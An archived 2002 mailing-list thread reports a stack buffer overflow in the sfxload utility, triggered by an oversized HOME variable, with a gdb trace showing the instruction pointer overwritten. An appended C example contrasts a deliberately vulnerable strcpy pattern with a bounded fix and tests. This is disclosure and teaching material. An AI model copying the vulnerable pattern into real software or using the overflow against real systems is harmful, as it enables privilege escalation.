Re: sfxload issues.

From: Gabriel A. Maggiotti (gmaggiotat_private)
Date: Thu Jan 03 2002 - 12:53:30 PST


    I successfully reproduced it in my box
    
    <quote>
    [root@tribilin /root]# cat /etc/issue
    
    Red Hat Linux release 7.0 (Guinness)
    Kernel 2.2.16-22 on an i586
    
    [root@tribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
    [root@tribilin /root]# ./sfxload
    Segmentation fault (core dumped)
    </quote>
    
    Regards,
    Gabriel A. Maggiotti
    
    Email:       gmaggiotat_private
    Webpage: http://qb0x.net
    
    
    ----- Original Message -----
    From: "l0rt" <simonat_private>
    To: <vuln-devat_private>
    Sent: Wednesday, January 02, 2002 5:53 PM
    Subject: sfxload issues.
    
    
    >
    > Vendor : http://members.tripod.de/iwai/awedrv.html
    > Program: sfxload
    > OS     : RH 7.1
    > Version: 0.4.3
    > SUID   : No
    > SGID   : No
    > Issue  : This may get called by an suid helper binary which would allow
    > a normal user to gain some more privs.
    >
    > --------------------------------------------------------------------------
    >
    > Details:
    > [raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`
    >
    > /* I just set HOME to be [10235] A's */
    >
    > [raven] /u1/cores/testing/bin> sfxload
    > Segmentation fault (core dumped)
    >
    > /* When sfxload is run it reads in the HOME var and cores!!! */
    >
    > [raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload  /* gdb */
    > GNU gdb 5.0rh-5 Red Hat Linux 7.1
    > Copyright 2001 Free Software Foundation, Inc.
    > GDB is free software, covered by the GNU General Public License, and you are
    > welcome to change it and/or distribute copies of it under certain conditions.
    > Type "show copying" to see the conditions.
    > There is absolutely no warranty for GDB.  Type "show warranty" for details.
    > This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
    > (gdb) core core
    > Core was generated by `AAAAAAAA'.
    > Program terminated with signal 11, Segmentation fault.
    > Reading symbols from /lib/i686/libm.so.6...done.
    > Loaded symbols for /lib/i686/libm.so.6
    > Reading symbols from /lib/i686/libc.so.6...done.
    > Loaded symbols for /lib/i686/libc.so.6
    > Reading symbols from /lib/ld-linux.so.2...done.
    > Loaded symbols for /lib/ld-linux.so.2
    > #0  0x41414141 in ?? ()
    > (gdb) bt
    > #0  0x41414141 in ?? ()
    > Cannot access memory at address 0x41414141
    > (gdb)
    >
    > /* EIP gets killed */
    >
    >
    >
    >
    > --
    > Regards,
    > l0rt
    >
    > ------------------------------------------------------------
    > "The only way to get rid of temptation is to give in to it."
    >
    >
    
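An added example, not sfxload's own code (its source is not on this page): the
pattern the crash above is consistent with, an environment variable copied with
no bound into a fixed-size stack buffer so that a long HOME runs over the saved
return address and the process resumes at 0x41414141, shown next to a bounded
version that refuses input which would not fit. The buffer size PATH_BUF, the
"/.sfxloadrc" name, the function names and the 10235-byte "A" string built
inline are assumptions for illustration only.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256            /* assumed buffer size, for illustration */
#define RC_NAME  "/.sfxloadrc"  /* assumed file name, for illustration */

/* Build an n-byte string of 'A', the way perl -e 'print "A" x 10235' does.
 * Constructed input for the example; caller frees. */
char *make_long_home(size_t n)
{
    char *s = malloc(n + 1);
    if (!s) return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

/* VULNERABLE pattern (assumed; sfxload's real code is not on the page):
 * getenv("HOME") copied into a fixed-size stack buffer with no length check.
 * A HOME longer than PATH_BUF overwrites the saved frame pointer and the
 * return address; 'A' is 0x41, hence "#0 0x41414141 in ?? ()" in gdb.
 * Kept here to show the bug; do not call it with a long HOME. */
size_t build_rc_path_unsafe(const char *home)
{
    char path[PATH_BUF];
    strcpy(path, home);          /* unbounded copy: this is the overflow */
    strcat(path, RC_NAME);       /* writes even further past the end */
    return strlen(path);
}

/* Hardened form: bounded formatting that rejects oversized input instead of
 * silently truncating it. Returns 0 on success, -1 if HOME is missing or the
 * result would not fit in out. */
int build_rc_path_safe(const char *home, char *out, size_t outsz)
{
    if (home == NULL || out == NULL || outsz == 0)
        return -1;
    /* snprintf returns the length it wanted; n >= outsz means it was cut. */
    int n = snprintf(out, outsz, "%s%s", home, RC_NAME);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Returns 1 when a 10235-byte HOME (the length from the thread) is refused. */
int long_home_is_rejected(void)
{
    char out[PATH_BUF];
    out[0] = 'x';
    char *home = make_long_home(10235);
    int rc = home ? build_rc_path_safe(home, out, sizeof out) : 0;
    free(home);
    return rc == -1 && out[0] == '\0';
}

/* Returns 1 when a normal HOME produces the expected path. */
int short_home_builds_expected(void)
{
    char out[PATH_BUF];
    return build_rc_path_safe("/root", out, sizeof out) == 0
        && strcmp(out, "/root/.sfxloadrc") == 0;
}

int main(void)
{
    /* The unsafe variant would segfault on the long HOME; the safe one refuses. */
    printf("10235-byte HOME rejected: %s\n", long_home_is_rejected() ? "yes" : "no");
    printf("/root builds expected path: %s\n", short_home_builds_expected() ? "yes" : "no");
    return 0;
}
```

The check to carry into an audit of the real binary is the same one the safe
variant performs: every environment variable the program reads must either be
bounded by the destination size or rejected when it is not, and the fix is
worth confirming by rerunning the thread's export HOME=... test against the
patched build.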



    This archive was generated by hypermail 2b30 : Thu Jan 03 2002 - 14:41:17 PST